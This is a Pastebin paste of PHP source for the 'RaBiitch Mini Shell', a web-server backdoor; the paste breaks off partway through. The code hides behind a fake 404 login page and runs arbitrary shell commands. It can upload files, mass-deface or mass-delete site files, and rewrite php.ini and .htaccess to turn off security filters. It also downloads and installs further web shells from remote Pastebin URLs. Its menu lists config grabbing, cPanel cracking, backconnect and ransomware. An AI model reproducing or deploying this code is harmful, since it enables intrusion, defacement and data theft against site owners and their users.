RaBiitch

RaBiitch M1N1 SH3LL

Jul 14th, 2018
435
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 258.69 KB | None | 0 0
  1. <?php
  2. set_time_limit(0);
  3. error_reporting(0);
  4.  
  5. $auth_pass = "fec87ee2ce2db774f788b34564d2b1df";
  6. if(get_magic_quotes_gpc()) {    
  7. function VEstripslashes($array) {       return is_array($array) ? array_map('VEstripslashes', $array) : stripslashes($array);   }  
  8. $_POST = VEstripslashes($_POST);
  9. $_COOKIE = VEstripslashes($_COOKIE); }
  10.  
  11.  
  12. function Login() {
  13.     die("
  14. <html><head><title>404 Not Found</title></head>
  15. <style>
  16. input { margin:0;background-color:#fff;border:1px solid #fff; }
  17. </style>
  18. <body>
  19. <h1>Not Found</h1>
  20. <p>The requested URL  was not found on this server.</p><hr>
  21. <form method=post>
  22. <input type=password name=pass></form></body></html>");
  23. }
  24.  
  25. function VEsetcookie($k, $v) {
  26.     $_COOKIE[$k] = $v;
  27.     setcookie($k, $v);
  28. }
  29.  
  30. if(!empty($auth_pass)) {
  31.     if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
  32.         VEsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
  33.  
  34.     if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
  35.         Login();
  36. }
  37. ?>
  38. <!DOCTYPE HTML>
  39. <HTML>
  40. <HEAD>
  41. <body>
  42. <link rel="shortcut icon" type="image/png" href="https://2.bp.blogspot.com/--rLYu7yG8J0/WypDMNWhVLI/AAAAAAAACaE/cLkvz5mcQKQfWh37sUkVY5NqMR05zCbugCLcBGAs/s1600/indonesia-flag-image-0020.png" />
  43. <link href="" rel="stylesheet" type="text/css">
  44. <title> RaBiitch Mini Shell </title>
  45. <style>
  46. body{
  47. background: #000000 url(https://3.bp.blogspot.com/-hXOUNi5bHk0/W0mEDXd7HSI/AAAAAAAAC2s/BJnpI1kdV1sZX4z-ioF7A3mb4pFx_ILdQCLcBGAs/s1600/hitam.jpg) scroll repeat center center;
  48. color:#fff;
  49. }
  50. li {
  51.     display: inline;
  52.     margin: 1px;
  53.     padding: 1px;
  54. }
  55. table{
  56. border: 3px #840000 solid;
  57. }
  58. #content .first{
  59. background-color: #8d0000;
  60. }
  61.  #menu a {
  62.                 padding:2px 10px;  
  63.                 margin:0;
  64.                 background:#000000;
  65.                 text-decoration:none;
  66.                 letter-spacing:2px;
  67.                 padding: 2px 10px;
  68.                 margin: 0;
  69.                 background: #000000;
  70.                 text-decoration: none;
  71.                 letter-spacing: 2px;
  72.                 border-radius: 2px;
  73.                 border-bottom: 2px solid #ab0000;
  74.                 border-top: 2px solid #ab0000;
  75.                 border-right: 2px solid #ab0000;
  76.                 border-left: 2px solid #ab0000;
  77.        }
  78.        #menu a:hover {
  79.             background:#408b1a;
  80.             border-bottom:0px solid #000000;
  81.             border-top:0px solid #000000;
  82.        }
  83. a{
  84. color:#fff;
  85. text-decoration: none;
  86. }
  87. textarea{
  88. backgroud-color:#000000;
  89. color: #fff;
  90. background: black;
  91. }
  92. input,select{
  93. border: 1px #b91a00 solid;
  94. -moz-border-radius: 5px;
  95. -webkit-border-radius:5px;
  96. border-radius:5px;
  97. }
  98. </style>
  99. </HEAD>
  100.  
  101. <?php
  102. function w($dir,$perm) {
  103.     if(!is_writable($dir)) {
  104.         return "<font color=red>".$perm."</font>";
  105.     } else {
  106.         return "<font color=green>".$perm."</font>";
  107.     }
  108. }
  109. function exe($cmd) {
  110.     if(function_exists('system')) {        
  111.         @ob_start();       
  112.         @system($cmd);     
  113.         $buff = @ob_get_contents();        
  114.         @ob_end_clean();       
  115.         return $buff;  
  116.     } elseif(function_exists('exec')) {        
  117.         @exec($cmd,$results);      
  118.         $buff = "";        
  119.         foreach($results as $result) {         
  120.             $buff .= $result;      
  121.         } return $buff;    
  122.     } elseif(function_exists('passthru')) {        
  123.         @ob_start();       
  124.         @passthru($cmd);       
  125.         $buff = @ob_get_contents();        
  126.         @ob_end_clean();       
  127.         return $buff;  
  128.     } elseif(function_exists('shell_exec')) {      
  129.         $buff = @shell_exec($cmd);     
  130.         return $buff;  
  131.     }
  132. }
  133. function sulap($text) {
  134.   if(!get_magic_quotes_gpc()) {
  135.     return $text;
  136.     }
  137.   return stripslashes($text);
  138. }
  139. function ambilKata($param, $kata1, $kata2){
  140.     if(strpos($param, $kata1) === FALSE) return FALSE;
  141.     if(strpos($param, $kata2) === FALSE) return FALSE;
  142.     $start = strpos($param, $kata1) + strlen($kata1);
  143.     $end = strpos($param, $kata2, $start);
  144.     $return = substr($param, $start, $end - $start);
  145.     return $return;
  146. }
  147. function perms($file){
  148. $perms = fileperms($file);
  149. if (($perms & 0xC000) == 0xC000) {
  150. // Socket
  151. $info = 's';
  152. } elseif (($perms & 0xA000) == 0xA000) {
  153. // Symbolic Link
  154. $info = 'l';
  155. } elseif (($perms & 0x8000) == 0x8000) {
  156. // Regular
  157. $info = '-';
  158. } elseif (($perms & 0x6000) == 0x6000) {
  159. // Block special
  160. $info = 'b';
  161. } elseif (($perms & 0x4000) == 0x4000) {
  162. // Directory
  163. $info = 'd';
  164. } elseif (($perms & 0x2000) == 0x2000) {
  165. // Character special
  166. $info = 'c';
  167. } elseif (($perms & 0x1000) == 0x1000) {
  168. // FIFO pipe
  169. $info = 'p';
  170. } else {
  171. // Unknown
  172. $info = 'u';
  173. }
  174.  
  175. // Owner
  176. $info .= (($perms & 0x0100) ? 'r' : '-');
  177. $info .= (($perms & 0x0080) ? 'w' : '-');
  178. $info .= (($perms & 0x0040) ?
  179. (($perms & 0x0800) ? 's' : 'x' ) :
  180. (($perms & 0x0800) ? 'S' : '-'));
  181.  
  182. // Group
  183. $info .= (($perms & 0x0020) ? 'r' : '-');
  184. $info .= (($perms & 0x0010) ? 'w' : '-');
  185. $info .= (($perms & 0x0008) ?
  186. (($perms & 0x0400) ? 's' : 'x' ) :
  187. (($perms & 0x0400) ? 'S' : '-'));
  188.  
  189. // World
  190. $info .= (($perms & 0x0004) ? 'r' : '-');
  191. $info .= (($perms & 0x0002) ? 'w' : '-');
  192. $info .= (($perms & 0x0001) ?
  193. (($perms & 0x0200) ? 't' : 'x' ) :
  194. (($perms & 0x0200) ? 'T' : '-'));
  195.  
  196. return $info;
  197. }
  198. $_c7e = 'WGFpIFN5bmRpY2F0ZQ==';
  199. $sys = php_uname();
  200. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  201. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? '<font>ON</font>' : '<font>OFF</font>';
  202. $getds = @ini_get("disable_functions");
  203. $ds = (!empty($getds)) ? "<font>$ds</font>" : "<font>NONE</font>";
  204. if(isset($_GET['path'])){
  205. $path = $_GET['path'];
  206. }else{
  207. $path = getcwd();
  208. }
  209. $path = str_replace('\\','/',$path);
  210. $paths = explode('/',$path);
  211. $home_r = $_SERVER['DOCUMENT_ROOT'];
  212. $_COPY = base64_decode($_c7e);
  213. if(get_magic_quotes_gpc()){
  214. foreach($_POST as $key=>$value){
  215. $_POST[$key] = stripslashes($value);
  216. }
  217. }
  218. if($_POST['upload']) {
  219.         if($_POST['tipe_upload'] == 'biasa') {
  220.             if(@copy($_FILES['ix_file']['tmp_name'], "$path/".$_FILES['ix_file']['name']."")) {
  221.                 $act = "<font color=green>Uploaded!</font> at <i><b>$path/".$_FILES['ix_file']['name']."</b></i>";
  222.             } else {
  223.                 $act = "<font color=red>Failed to upload file</font>";
  224.             }
  225.         } else {
  226.             $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  227.             $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  228.             if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  229.                 if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  230.                     $act = "<font color=green>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  231.                 } else {
  232.                     $act = "<font color=red>Failed to upload file</font>";
  233.                 }
  234.             } else {
  235.                 $act = "<font color=red>Failed to upload file</font>";
  236.             }
  237.         }
  238.     }
  239.     echo "<center>Uploader :
  240.     <form method='post' enctype='multipart/form-data'>
  241.     <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($path,"Writeable")." ]
  242.     <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  243.     <input type='file' name='ix_file'>
  244.     <input type='submit' value='upload' name='upload'>
  245.     </form>";
  246.     echo $act;
  247. echo '<center>
  248. <table width="700" align="center">
  249. <center>
  250. <form method="get">
  251. <select name="shell">
  252. <option value="">Shell Creator</option>
  253. <option value="wso">WSO Shell</option>
  254. <option value="idx">IDX Shell</option>
  255. <option value="b374k">B374K Shell</option>
  256. <option value="r57">R57 Shell</option>
  257. <option value="b374k">b374k Shell</option>
  258. <option value="blackhat">BlackHat Shell</option>
  259. <option value="noname">Noname Shell</option>
  260. <option value="RaBiitch_Hidden_Shell">RaBiitch Hidden Shell</option>
  261. </select>
  262. <input type="submit" value=">">
  263. </form>
  264. </center>
  265. ';
  266. echo'
  267. <div id="menu">
  268. <center>
  269. <ul>
  270. <li><a href="?">Home</a></li>
  271. <li><a href="?path='.$path.'&RaBiitch=info">System Info</a></li>
  272. <li><a href="?path='.$path.'&RaBiitch=config">Config Grab</a></li>
  273. <li><a href="?path='.$path.'&RaBiitch=crkcp">Cp Crack</a></li>
  274. <li><a href="?path='.$path.'&RaBiitch=jumping">Jumping</a></li>
  275. <li><a href="?path='.$path.'&RaBiitch=symlink">Symlink</a></li>
  276. <li><a href="?path='.$path.'&RaBiitch=adminer">Adminer</a></li><br><br>
  277. <li><a href="?path='.$path.'&RaBiitch=network">BackConnect</a>
  278. <li><a href="?path='.$path.'&RaBiitch=mail">Mailer</a></li>
  279. <li><a href="?path='.$path.'&RaBiitch=edituser">Auto Edit User</a></li>
  280. <li><a href="?path='.$path.'&RaBiitch=zoneh">Zone-H</a></li>
  281. <li><a href="?path='.$path.'&RaBiitch=defid">Defacer.id</a></li>
  282. <li><a href="?path='.$path.'&RaBiitch=symconfig">SymConfig</a></li><br><br>
  283. <li><a href="?path='.$path.'&RaBiitch=disablefunc">Disable Functions</a></li>
  284. <li><a href="?path='.$path.'&RaBiitch=domains">Domain Views</a></li>
  285. <li><a href="?path='.$path.'&RaBiitch=ganteng">Ransomeware</a></li>
  286. <li><a href="?path='.$path.'&RaBiitch=hashid">Hash ID</a></li>
  287. <li><a href="?path='.$path.'&RaBiitch=bing">Bing Grab</a></li>
  288. <li><a href="?path='.$path.'&RaBiitch=mass_deface">Mass Tools</a></li><br><br>
  289. <li><a href="?path='.$path.'&RaBiitch=cmd">Command</a></li>
  290. <li><a href="?path='.$path.'&RaBiitch=csrfup">Csrf Exploiter</a></li>
  291. <li><a href="?path='.$path.'&RaBiitch=sh311_scanner">Backdoor Scan</a></li>
  292. <li><a href="?path='.$path.'&RaBiitch=logs">Pengaman Bro</a></li>
  293. <li><a href="?path='.$path.'&RaBiitch=kill">Kill Your Self</a></li>
  294. </ul></center></div>';
  295. echo '
  296. <br>
  297. <table width="700" align="center">
  298. <tr><td><font color="white">Current Path :</font>';
  299. foreach($paths as $id=>$pat){
  300. if($pat == '' && $id == 0){
  301. $a = true;
  302. echo '<a href="?path=/">/</a>';
  303. continue;
  304. }
  305. if($pat == '') continue;
  306. echo '<a href="?path=';
  307. for($i=0;$i<=$id;$i++){
  308. echo "$paths[$i]";
  309. if($i != $id) echo "/";
  310. }
  311. echo '">'.$pat.'</a>/';
  312. }
  313. echo '</td></tr>';
  314. echo '</table>';
  315. if($_GET['RaBiitch'] == 'logout') {
  316. echo '<form action="?patch='.$path.'&do=logout" method="post">';
  317.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  318.     echo 'Good Bye!!';
  319. } elseif($_GET['RaBiitch'] == 'cmd') {
  320. echo "<br><fieldset>";
  321.     echo "<form method='post'>
  322. <font style='text-decoration: underline;'>Command : </font>
  323. <input type='text' size='30' height='10' name='command'><input type='submit' name='c7ecmd' value='>>'>
  324.     </form> ";
  325.     if(isset($_POST['c7ecmd']))
  326. {
  327.  
  328. echo'<br><div style="background:#6d6d6d;margin:0px;padding:1px;text-align:left;color:lime;"><pre>';
  329. $cmd = $_POST['command'];
  330. if($cmd == "")
  331. {
  332.  
  333. echo "Please Insert Command!";
  334.  }
  335.  
  336. elseif(isset($cmd))
  337.  {
  338.  $output = exe($cmd);
  339.  echo $output; }
  340. echo'</pre></div><br><br>';
  341. }
  342. echo "</fieldset><br>";
  343. }elseif($_GET['RaBiitch'] == 'mass_deface') {
  344.     echo "<center><form action=\"\" method=\"post\">\n";
  345.     $dirr=$_POST['d_dir'];
  346.     $index = $_POST["script"];
  347.     $index = str_replace('"',"'",$index);
  348.     $index = stripslashes($index);
  349.     function edit_file($file,$index){
  350.         if (is_writable($file)) {
  351.         clear_fill($file,$index);
  352.         echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
  353.         }
  354.         else {
  355.             echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
  356.             }
  357.             }
  358.     function hapus_massal($dir,$namafile) {
  359.         if(is_writable($dir)) {
  360.             $dira = scandir($dir);
  361.             foreach($dira as $dirb) {
  362.                 $dirc = "$dir/$dirb";
  363.                 $lokasi = $dirc.'/'.$namafile;
  364.                 if($dirb === '.') {
  365.                     if(file_exists("$dir/$namafile")) {
  366.                         unlink("$dir/$namafile");
  367.                     }
  368.                 } elseif($dirb === '..') {
  369.                     if(file_exists("".dirname($dir)."/$namafile")) {
  370.                         unlink("".dirname($dir)."/$namafile");
  371.                     }
  372.                 } else {
  373.                     if(is_dir($dirc)) {
  374.                         if(is_writable($dirc)) {
  375.                             if(file_exists($lokasi)) {
  376.                                 echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  377.                                 unlink($lokasi);
  378.                                 $idx = hapus_massal($dirc,$namafile);
  379.                             }
  380.                         }
  381.                     }
  382.                 }
  383.             }
  384.         }
  385.     }
  386.     function clear_fill($file,$index){
  387.         if(file_exists($file)){
  388.             $handle = fopen($file,'w');
  389.             fwrite($handle,'');
  390.             fwrite($handle,$index);
  391.             fclose($handle);  } }
  392.  
  393.     function gass(){
  394.         global $dirr , $index ;
  395.         chdir($dirr);
  396.         $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  397.         $files = scandir($dirr) ;
  398.         $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
  399.         sort($files);
  400.         $n = 0 ;
  401.         foreach ($files as $file){
  402.             if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
  403.                 echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
  404.                 edit_file($file,$index);
  405.                 flush();
  406.                 $n = $n +1 ;
  407.                 }
  408.                 }
  409.                 echo "<br>";
  410.                 echo "<center><br><h3>$n Kali Anda Telah Ngecrot  Disini </h3></center><br>";
  411.                     }
  412.     function ListFiles($dirrall) {
  413.  
  414.     if($dh = opendir($dirrall)) {
  415.  
  416.        $files = Array();
  417.        $inner_files = Array();
  418.        $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  419.        $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
  420.         while($file = readdir($dh)) {
  421.             if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
  422.                 if(is_dir($dirrall . "/" . $file)) {
  423.                     $inner_files = ListFiles($dirrall . "/" . $file);
  424.                     if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  425.                 } else {
  426.                     array_push($files, $dirrall . "/" . $file);
  427.                 }
  428.             }
  429.             }
  430.  
  431.             closedir($dh);
  432.             return $files;
  433.         }
  434.     }
  435.     function gass_all(){
  436.         global $index ;
  437.         $dirrall=$_POST['d_dir'];
  438.         foreach (ListFiles($dirrall) as $key=>$file){
  439.             $file = str_replace('//',"/",$file);
  440.             echo "<center><strong>$file</strong> ===>";
  441.             edit_file($file,$index);
  442.             flush();
  443.         }
  444.         $key = $key+1;
  445.     echo "<center><br><h3>$key Kali Anda Telah Ngecrot  Disini  </h3></center><br>"; }
  446.     function sabun_massal($dir,$namafile,$isi_script) {
  447.         if(is_writable($dir)) {
  448.             $dira = scandir($dir);
  449.             foreach($dira as $dirb) {
  450.                 $dirc = "$dir/$dirb";
  451.                 $lokasi = $dirc.'/'.$namafile;
  452.                 if($dirb === '.') {
  453.                     file_put_contents($lokasi, $isi_script);
  454.                 } elseif($dirb === '..') {
  455.                     file_put_contents($lokasi, $isi_script);
  456.                 } else {
  457.                     if(is_dir($dirc)) {
  458.                         if(is_writable($dirc)) {
  459.                             echo "[<font color=lime>DONE</font>] $lokasi<br>";
  460.                             file_put_contents($lokasi, $isi_script);
  461.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
  462.                         }
  463.                     }
  464.                 }
  465.             }
  466.         }
  467.     }
  468.     if($_POST['mass'] == 'onedir') {
  469.         echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
  470.         $ini="http://";
  471.         $mainpath=$_POST[d_dir];
  472.         $file=$_POST[d_file];
  473.         $dir=opendir("$mainpath");
  474.         $code=base64_encode($_POST[script]);
  475.         $indx=base64_decode($code);
  476.         while($row=readdir($dir)){
  477.         $start=@fopen("$row/$file","w+");
  478.         $finish=@fwrite($start,$indx);
  479.         if ($finish){
  480.             echo"$ini$row/$file\n";
  481.             }
  482.         }
  483.         echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
  484.         $mainpath=$_POST[d_dir];$file=$_POST[d_file];
  485.         $dir=opendir("$mainpath");
  486.         $code=base64_encode($_POST[script]);
  487.         $indx=base64_decode($code);
  488.         while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
  489.         $finish=@fwrite($start,$indx);
  490.         if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
  491.         }
  492.  
  493.     }
  494.     elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
  495.     elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
  496.     elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
  497.     elseif($_POST['mass'] == 'massdeface') {
  498.         echo "<div style='margin: 5px auto; padding: 5px'>";
  499.         sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  500.         echo "</div>";  }
  501.     else {
  502.         echo "
  503.         <center><font style='text-decoration: underline;'>
  504.         Select Type:<br>
  505.         </font>
  506.         <select class=\"select\" name=\"mass\"  style=\"width: 450px;\" height=\"10\">
  507.         <option value=\"onedir\">Mass Deface 1 Dir</option>
  508.         <option value=\"massdeface\">Mass Deface ALL Dir</option>
  509.         <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
  510.         <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
  511.         <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
  512.         <font style='text-decoration: underline;'>Folder:</font><br>
  513.         <input type='text' name='d_dir' value='$path' style='width: 450px;' height='10'><br>
  514.         <font style='text-decoration: underline;'>Filename:</font><br>
  515.         <input type='text' name='d_file' value='dc.php' style='width: 450px;' height='10'><br>
  516.         <font style='text-decoration: underline;'>Index File:</font><br>
  517.         <textarea name='script' style='width: 450px; height: 200px;'>Hacked By ./RaBiitch</textarea><br>
  518.         <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  519.         </form></center>";
  520.         }
  521. } elseif($_GET['RaBiitch'] == 'csrfup')
  522. {  
  523. echo '<html>
  524. <center><h1 style="font-size:33px;">CSRF Exploiter IndoXPloit<br>BlackHell Team</h1><br><br>
  525. <font size="3">*Note : Post File, Type : Filedata / dzupload / dzfile / dzfiles / file / ajaxfup / files[] / qqfile / userfile / etc</font>
  526. <br><br>
  527. <form method="post" style="font-size:25px;">
  528. URL: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/path/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
  529. POST File: <input type="text" name="pf" size="50" height="10" placeholder="Lihat diatas ^" style="margin: 5px auto; padding-left: 5px;" required><br>
  530. <input type="submit" name="d" value="Lock!">
  531. </form>';
  532. $url = $_POST["url"];
  533. $pf = $_POST["pf"];
  534. $d = $_POST["d"];
  535. if($d) {
  536.     echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><input type='submit' name='g' value='Upload'></form></form>
  537. </html>";
  538. }
  539. } elseif($_GET['RaBiitch'] == 'hashid') {
  540. if (isset($_POST['gethash'])) {
  541.         $hash = $_POST['hash'];
  542.         if (strlen($hash) == 32) {
  543.             $hashresult = "MD5 Hash";
  544.         } elseif (strlen($hash) == 40) {
  545.             $hashresult = "SHA-1 Hash/ /MySQL5 Hash";
  546.         } elseif (strlen($hash) == 13) {
  547.             $hashresult = "DES(Unix) Hash";
  548.         } elseif (strlen($hash) == 16) {
  549.             $hashresult = "MySQL Hash / /DES(Oracle Hash)";
  550.         } elseif (strlen($hash) == 41) {
  551.             $GetHashChar = substr($hash, 40);
  552.             if ($GetHashChar == "*") {
  553.                 $hashresult = "MySQL5 Hash";
  554.             }
  555.         } elseif (strlen($hash) == 64) {
  556.             $hashresult = "SHA-256 Hash";
  557.         } elseif (strlen($hash) == 96) {
  558.             $hashresult = "SHA-384 Hash";
  559.         } elseif (strlen($hash) == 128) {
  560.             $hashresult = "SHA-512 Hash";
  561.         } elseif (strlen($hash) == 34) {
  562.             if (strstr($hash, '$1$')) {
  563.                 $hashresult = "MD5(Unix) Hash";
  564.             }
  565.         } elseif (strlen($hash) == 37) {
  566.             if (strstr($hash, '$apr1$')) {
  567.                 $hashresult = "MD5(APR) Hash";
  568.             }
  569.         } elseif (strlen($hash) == 34) {
  570.             if (strstr($hash, '$H$')) {
  571.                 $hashresult = "MD5(phpBB3) Hash";
  572.             }
  573.         } elseif (strlen($hash) == 34) {
  574.             if (strstr($hash, '$P$')) {
  575.                 $hashresult = "MD5(Wordpress) Hash";
  576.             }
  577.         } elseif (strlen($hash) == 39) {
  578.             if (strstr($hash, '$5$')) {
  579.                 $hashresult = "SHA-256(Unix) Hash";
  580.             }
  581.         } elseif (strlen($hash) == 39) {
  582.             if (strstr($hash, '$6$')) {
  583.                 $hashresult = "SHA-512(Unix) Hash";
  584.             }
  585.         } elseif (strlen($hash) == 24) {
  586.             if (strstr($hash, '==')) {
  587.                 $hashresult = "MD5(Base-64) Hash";
  588.             }
  589.         } else {
  590.             $hashresult = "Hash type not found";
  591.         }
  592.     } else {
  593.         $hashresult = "Not Hash Entered";
  594.     }
  595. ?>
  596.     <center><br><Br><br>
  597.    
  598.         <form action="" method="POST">
  599.         <tr>
  600.         <table >
  601.         <th colspan="5">Hash Identification</th>
  602.         <tr class="optionstr"><B><td>Enter Hash</td></b><td>:</td>  <td><input type="text" name="hash" size='60' class="inputz" /></td><td><input type="submit" class="inputzbut" name="gethash" value="Identify Hash" /></td></tr>
  603.         <tr class="optionstr"><b><td>Result</td><td>:</td><td><?php echo $hashresult; ?></td></tr></b>
  604.     </table></tr></form>
  605.     </center>
  606. <?php
  607. } elseif($_GET['RaBiitch'] == 'domains'){echo "<center><div class='mybox'><p align='center' class='cgx2'>Domains and Users</p>";$d0mains = @file("/etc/named.conf");if(!$d0mains){die("<center>Error : can't read [ /etc/named.conf ]</center>");}echo '<table id="output"><tr bgcolor=#cecece><td>Domains</td><td>users</td></tr>';foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>";flush();}}}echo'</div></center>';
  608. } elseif($_GET['RaBiitch'] == 'disablefunc'){
  609.         echo "<center>";
  610.         echo "<form method=post><input type=submit name=ini value='php.ini' />&nbsp;<input type=submit name=htce value='.htaccess' /></form>";
  611.         if(isset($_POST['ini']))
  612. {
  613.         $file = fopen("php.ini","w");
  614.         echo fwrite($file,"disable_functions=none
  615. safe_mode = Off
  616.     ");
  617.         fclose($file);
  618.         echo "<a href='php.ini'>click here!</a>";
  619. }       if(isset($_POST['htce']))
  620. {
  621.         $file = fopen(".htaccess","w");
  622.         echo fwrite($file,"<IfModule mod_security.c>
  623. SecFilterEngine Off
  624. SecFilterScanPOST Off
  625. </IfModule>
  626.     ");
  627.         fclose($file);
  628.         echo "htaccess successfully created!";
  629. }
  630.         echo"</center>";
  631. }elseif($_GET['shell'] == 'wso'){
  632.     $tools_dir = mkdir('RaBiitch_tools', 0755);
  633.     $file_tools = "RaBiitch_tools/wso.php";
  634.     $isi_httools = "<IfModule mod_security.c>
  635. SecFilterEngine Off
  636. SecFilterScanPOST Off
  637. </IfModule>";
  638.     $httools = fopen(".htaccess", "w");
  639.     $tools_script = file_get_contents("http://pastebin.com/raw.php?i=N0eh3Q7Y");
  640.     $tools = fopen($file_tools, "w");
  641.     fwrite($tools, $tools_script);
  642.     fwrite($httools, $isi_httools);
  643.     chmod($file_tools, 0755);
  644.     echo "Done <a href='RaBiitch_tools/wso.php'>WSO Shell Here</a>";
  645. }
  646. elseif($_GET['shell'] == 'idx'){
  647.     $tools2_dir = mkdir('RaBiitch_tools', 0755);
  648.     $file_tools2 = "RaBiitch_tools/idx.php";
  649.     $isi_httools2 = "<IfModule mod_security.c>
  650. SecFilterEngine Off
  651. SecFilterScanPOST Off
  652. </IfModule>";
  653.     $httools2 = fopen(".htaccess", "w");
  654.     $tools2_script = file_get_contents("https://pastebin.com/raw/5xffCGmG");
  655.     $tools2 = fopen($file_tools2, "w");
  656.     fwrite($tools2, $tools2_script);
  657.     fwrite($httools2, $isi_httools2);
  658.     chmod($file_tools2, 0755);
  659.     echo "Done <a href='RaBiitch_tools/idx.php'>Idx Shell Here</a>";
  660. }
  661. elseif($_GET['shell'] == 'b374k'){
  662.     $tools3_dir = mkdir('RaBiitch_tools', 0755);
  663.     $file_tools3 = "RaBiitch_tools/b374k.php";
  664.     $isi_httools3 = "<IfModule mod_security.c>
  665. SecFilterEngine Off
  666. SecFilterScanPOST Off
  667. </IfModule>";
  668.     $httools3 = fopen(".htaccess", "w");
  669.     $tools3_script = file_get_contents("http://pastebin.com/raw.php?i=cR71LiMp");
  670.     $tools3 = fopen($file_tools3, "w");
  671.     fwrite($tools3, $tools3_script);
  672.     fwrite($httools3, $isi_httools3);
  673.     chmod($file_tools3, 0755);
  674.     echo "Done <a href='RaBiitch_tools/b374k.php'>b374k Shell Here</a>";
  675. }
  676. elseif($_GET['shell'] == 'sadrazam'){
  677.     $tools4_dir = mkdir('RaBiitch_tools', 0755);
  678.     $file_tools4 = "RaBiitch_tools/sadrazam.php";
  679.     $isi_httools4 = "<IfModule mod_security.c>
  680. SecFilterEngine Off
  681. SecFilterScanPOST Off
  682. </IfModule>";
  683.     $httools4 = fopen(".htaccess", "w");
  684.     $tools4_script = file_get_contents("http://pastebin.com/raw.php?i=xjKrnnBD");
  685.     $tools4 = fopen($file_tools4, "w");
  686.     fwrite($tools4, $tools4_script);
  687.     fwrite($httools4, $isi_httools4);
  688.     chmod($file_tools4, 0755);
  689.     echo "Done <a href='RaBiitch_tools/sadrazam.php'>Sadrazam Shell Here</a>";
  690. }
  691. elseif($_GET['shell'] == 'blackhat'){
  692.     $tools5_dir = mkdir('RaBiitch_tools', 0755);
  693.     $file_tools5 = "RaBiitch_tools/bh.php";
  694.     $isi_httools5 = "<IfModule mod_security.c>
  695. SecFilterEngine Off
  696. SecFilterScanPOST Off
  697. </IfModule>";
  698.     $httools5 = fopen(".htaccess", "w");
  699.     $tools5_script = file_get_contents("http://pastebin.com/raw.php?i=3L2ESWeu");
  700.     $tools5 = fopen($file_tools5, "w");
  701.     fwrite($tools5, $tools5_script);
  702.     fwrite($httools5, $isi_httools5);
  703.     chmod($file_tools5, 0755);
  704.     echo "Done <a href='RaBiitch_tools/bh.php'>Black Hat Shell Here</a>";
  705. }
  706. elseif($_GET['shell'] == 'r57'){
  707.     $tools6_dir = mkdir('RaBiitch_tools', 0755);
  708.     $file_tools6 = "RaBiitch_tools/r57.php";
  709.     $isi_httools6 = "<IfModule mod_security.c>
  710. SecFilterEngine Off
  711. SecFilterScanPOST Off
  712. </IfModule>";
  713.     $httools6 = fopen(".htaccess", "w");
  714.     $tools6_script = file_get_contents("http://pastebin.com/raw.php?i=G2VEDunW");
  715.     $tools6 = fopen($file_tools6, "w");
  716.     fwrite($tools6, $tools6_script);
  717.     fwrite($httools6, $isi_httools6);
  718.     chmod($file_tools6, 0755);
  719.     echo "Done <a href='RaBiitch_tools/r57.php'>R57 Shell Here</a>";
  720. }
  721. elseif($_GET['shell'] == 'RaBiitch_Hidden_Shell'){
